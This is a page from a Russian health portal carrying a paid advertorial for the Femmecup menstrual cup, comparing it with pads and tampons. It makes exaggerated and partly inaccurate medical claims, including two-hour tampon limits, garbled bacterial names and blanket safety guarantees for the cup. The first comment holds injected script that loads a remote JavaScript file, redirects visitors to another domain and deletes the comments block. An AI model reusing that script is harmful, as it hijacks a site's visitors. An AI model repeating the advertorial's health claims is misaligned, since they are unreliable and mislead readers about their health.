Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женская чашечка: новое сл...  >>  Женская чашечка: новое слово в гигиене
 
Обратная связь
 

Женская чашечка: новое слово в гигиене

Размер шрифта
10 февраля 2012 00:00
  • google_analytics: false
  • Нравится

Менструация. Каждая женщина переживает этот период по-своему. У некоторых она проходит безболезненно и как по часам, другие мучаются от болей в пояснице, тошноты и судорог.

1

Чтобы менструация не стала помехой, ведите календарь месячных, запоминайте дату начала последней менструации. Вы узнаете длительность цикла, и сможете планировать свои дела или подготовиться к началу цикла: взять прокладку, тампон или Femmecup. Выбор средств гигиены всегда остается за женщиной, но этот выбор, в первую очередь, должен быть безопасен для ее здоровья.

Что такое Femmecup

Femmecup – это медицинский продукт, а не яркий аксессуар. Это единственная менструальная чашечка имеющая регистрационное удостоверение Министерства здравоохранения и социального развития Российской Федерации, прошел испытания в клиниках России и сертифицирован на территории РФ, как изделие медицинского назначения.

Femmecup – это мягкая многоразовая силиконовая менструальная чашечка, которую, как тампон, помещают во влагалище, с той разницей, что она не абсорбирует (впитывает) менструальные выделения, а собирает их. Femmecup обладает множеством преимуществ: она более экологически чистая, безопасная для здоровья, экономичная и удобная по сравнению с тампонами или прокладками.

Femmecup – это прекрасный способ соблюдения гигиены для женщин, в том числе, для страдающих от экземы или различных кожных аллергий (например, аллергии на обычные тампоны или прокладки).

1Femmecuр вводится во влагалище, где удерживается влагалищными мышцами, за счет которых создается вакуум, и ни при каких усилиях самостоятельно не выпадает. Как и тампоны, он полностью незаметен, однако, в отличие от них, Femmecup не впитывает кровь, а собирает ее в себя, не позволяя выделениям соприкасаться с влагалищем. Плотное соприкосновение капа и влагалища не позволяет ее содержимому пролиться. Кроме того, чашечка Femmecup обеспечивают герметичность внутренней среды влагалища, что препятствует воздействию на нее внешней среды (например, попадания воды при купании).

Чашечка Femmecup может использоваться днем и ночью, в том числе и при занятии спортом и плаванием.

Из чего изготовлен Femmecup?

  • Чашечка Femmecup изготавливается из гипоаллергенного материала – медицинского силикона. Силикон выдерживает температуру от -70С до +250С.
  • У медицинского силикона множество положительных свойств: высокая сопротивляемость деформирующей силе, минимальная деградация с течением времени и сопротивляемость окислению и гидролизу. Силикон - является химически инертным и биологически совместимым.
  • Femmecup не содержит токсических и отбеливающих веществ и, при соприкосновении с телом, не вызывает нарушения естественной флоры и не сушит слизистую.
  • Женские менструальные выделения собираются внутри чаши Femmecup, которая не дает им соприкасаться со слизистой влагалища.
  • Материал, из которого изготавливается чашечка Femmecup, мягок и пластичен, поэтому не вызывает никакого чувства дискомфорта.
  • Femmecup помещается непосредственно во влагалище, что позволяет женщинам вести активный образ жизни даже в критические дни.

Преимущества Femmecup перед прокладками и тампонами

Пока основными средствами интимной женской гигиены во время критических дней являются тампоны и прокладки. Попробуем разобраться в достоинствах и недостатках их использования, и сравним их с чашей Femmecup.

Прокладки – самое древнее средство женской гигиены. Однако за время своего существования они претерпели существенные изменения: если раньше прокладка представляла собой лоскут из натурального материала, то современная прокладка – это продукт, практически не содержащий натуральных компонентов.

Итак, знаете ли вы, что:
 

  • для производства одной прокладки используется от 100 до 200 грамм нефти – ценнейшего невосстанавливаемого природного ресурса;
  • для полного разложения одной прокладки требуется от 100 до 500 лет;
  • во всех супервпитывающих прокладках с крылышками, помимо синтетического верхнего слоя, содержатся гелевые гранулы. Основной составляющей этих гранул является химический кремний, который вступает в реакцию с менструальными выделениями;
  • каждая прокладка защищена от протекания специальным непромокаемым слоем, из-за которого при ее использовании возникает парниковый эффект;
  • выделения, попадая на прокладку, создают влажную питательную среду для бактерий – в том числе, и вредных. При этом пик численности бактерий на поверхности прокладки наступает уже через 15 минут после попадания на нее крови;
  • многие производители прокладок используют отдушки и увлажнители, которые могут оказывать непредсказуемый эффект на организм каждой отдельной женщины;
  • производители прокладок постоянно совершенствуют свою продукцию с целью снижения ее стоимости, не заботясь при этом о проведении испытаний, позволяющих определить отдаленные последствия внедрения подобных новшеств.

Тампоны так же одно из самых популярных средств женской гигиены. Они обеспечивают сухость, позволяют не менять активного образа жизни даже во время менструации и не так заметны, как прокладки.

Чем опасны тампоны?

  • введение тампона может нанести микротравмы слизистой влагалища;
  • тампоны впитывают не только менструальную кровь, но и необходимые для здоровья влагалища вещества;
  • тампоны поглощают ионы магния, тем самым меняют внутреннюю среду влагалища;
  • тампоны создают благоприятные условия для развития золотистого стрептококка;
  • материал тампона отбеливается с помощью агрессивных химикатов, часть которых остается на поверхности тампона и попадает в организм женщины.

Во-вторых, тампоны могут нанести вред всему организму женщины. В 1980-х годах было зафиксировано несколько случаев смерти женщин, погибших из-за синдрома токсического шока. Эти женщины использовали тампоны, сделанные из материала с плохими впитывающими свойствами. В результате внутри организма начали размножаться бактерии и токсины за счет раздражения слизистой мембраны стен влагалища.

Сегодня риск СТШ уже не так высок – материал тампонов впитывает намного лучше. Тем не менее любой, даже очень качественный тампон надо менять каждые 2 часа: в силу своего строения, тампон перекрывает отток жидкости от матки, создавая тем самым влажную и благоприятную среду для патогенных микроорганизмов и увеличивая риск развития синдрома токсического шока.

1

Какие же преимущества у Femmecup перед тампонами и прокладками?

Итак, Femmecup так же, как и тампон обеспечивает сухость и комфорт и позволяет не менять активного образа жизни. Длина чашечки Femmecup 50 мм, а максимальная ширина 45 мм. Вмещает она 15 мл выделений. Длина ножки в основании составляет 25 мм; ее можно укоротить до любой длины, некоторые женщины предпочитают обрезать ее полностью. Под верхним ободком находятся маленькие дырочки, при нажатии на свод чашечки, через дырочки попадает воздух, вакуум разряжается и Femmecup свободно извлекается.

Рассмотрим же преимущества Femmecup более детально.
 

Тампоны Femmecup
Тампон нарушает слизистую и нормальную микрофлору влагалища. Femmecup нейтрален по отношению к слизистой влагалища, так как изготавливается из медицинского силикона, являющийся химически инертным и биологически совместимым материалом.
Материал, из которого изготовлен тампон, отбеливается с помощью агрессивных химикатов, часть которых неизбежно остается на поверхности тампона и попадает в организм женщины. Femmecup не содержит издержек производства тампонов и прокладок, а также пестицидов, поликарбонатов, полистирола и отбеливающих веществ.
Введение тампона во влагалище может стать причиной микротравм его слизистой. Введение Femmecup во влагалище не нарушает его слизистую и не вызывает чувства внутреннего дискомфорта, зачастую вызываемого использованием тампонов. При правильном введении он абсолютно не ощущается.
Тампоны абсорбируют не только менструальную кровь, но и субстраты, необходимые для развития лактобацилл (лактобактерий), которые являются составляющей здоровой среды. Femmecup не абсорбирует кровь, а собирает ее, не позволяя выделениям проникать наружу.
Производители тампонов не могут гарантировать их стерильность. Стерильность Femmecup контролируется самой женщиной.
Тампоны могут вызвать синдром токсического шока. При использовании Femmecup не зафиксировано не одного случая СТШ.
Тампоны могут находиться во влагалище не более 2 часов. Femmecup может находиться в организме женщины до 12 часов.
Тампоны вызывают чувство внутреннего дискомфорта и сухость. Femmecup не вызывает дискомфорта.

1

А теперь сравним Femmecup с прокладкой…
 

Прокладки Femmecup
При производстве прокладок используется нефть, являющаяся невосполнимым ресурсом. При этом каждая женщина за всю жизнь использует более 500 прокладок. Femmecup – это средство женской гигиены многоразового использования. При правильном использовании и уходе один кап служит женщине до 5 лет.
Для полного разложения одной прокладки требуется более 100 лет. Один Femmecup заменяет от 500 до 1200 прокладок.
Прокладки создают парниковый эффект, благоприятный для развития бактерий. Femmecup не позволяет выделениям вступать в реакцию с кислородом, обеспечивая за счет вакуума герметичность внутренней среды.
Гелевые гранулы в составе прокладки вступают в реакцию с менструальными выделениями, нанося вред человеческому организму. Материал, из которого изготовлен Femmecup, не вступает в реакцию с выделениями и является абсолютно нейтральным по отношению к организму человека.
Многие современные производители прокладок используют отдушки и увлажнители, которые неоднозначно могут воздействовать на организм каждой отдельной женщины. Femmecup изготавливается из силикона, многолетний опыт использования которого подтверждает его нейтральность по отношению к организму человека.

 

Задумайтесь об этом, ведь это Ваше здоровье.

Основные особенности Femmecup:

  • не меняет уровня вагинальной флоры
  • не является причиной возникновения восходящих инфекций, молочницы и эндометриоза
  • не вызывает синдром токсического шока
  • не создает влажных и теплых условий возле вульвы, которые благоприятны для роста бактерий
  • не удлиняют продолжительность месячных
  • не содержат диоксидов и других токсинов
  • не содержит латекса и пластика
  • никаких красок или искусственных добавок
  • комфортный и надежный
  • чистый, удобный в использовании
  • можно носить до 12 часов, не опустошая

Femmecup – это самая удобная, комфортная и надежная форма женской гигиены в настоящее время. Ее можно использовать с первых месячных.

Эксперты компании Femmecup сделали свой продукт по-настоящему комфортным, легким в использовании и надежным. Он идеален для ежедневного применения, путешествий, бега, скалолазания, танцев, кемпинга, плаванья, дайвинга, йоги, экстремальных видов спорта и даже более!

Сомневаетесь?

Поначалу идея использования чаши Femmecup может показаться вам непривлекательной. Ведь это кажется негигиеничным, некомфортным и, к тому же, нужно ко всему прикасаться руками, не так ли? Это стандартная первая реакция на Femmecup, которая со временем пересматривается.

Большинство из нас выросло в эпоху, когда альтернативы одноразовым женским предметам гигиены не существовало, и это, конечно, сформировало определенные привычки и стереотипы, связанные с менструальным циклом.

Всегда бывает трудно воспринять какие-то новшества, особенно когда это связано с изменением привычек. Но возможные польза и выгода от использования менструальных чашечек слишком велики, чтобы их игнорировать.

Всю интересующую информацию можно посмотреть на сайте: www.femmecup.ru или обсудить на форуме.

 

Все ваши вопросы по использованию продукта вы можете задать консультанту ООО "ФеммиКапРус" Аршакян Софии.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

20 августа 2015 в 13:01

Комментарий удален за нарушение Правил общения

3 - Гость

21 августа 2015 в 13:39

Комментарий удален за нарушение Правил общения

Статьи

       
Тампон против менструальной чаши. Что лучше?   Оказывается, виагра помогает не только мужчинам, но и женщинам! В чем же?   Месячные заставляют женщин бороться друг с другом! Какие дни самые опасные?   Чего хотят женщины? Все зависит от даты!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
12 фактов о менструальном цикле, которые необходимо знать
Как избавиться от ужасных месячных?
Как устроить свою жизнь вокруг месячных

Тесты

1
Как подобрать контрацептивы?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.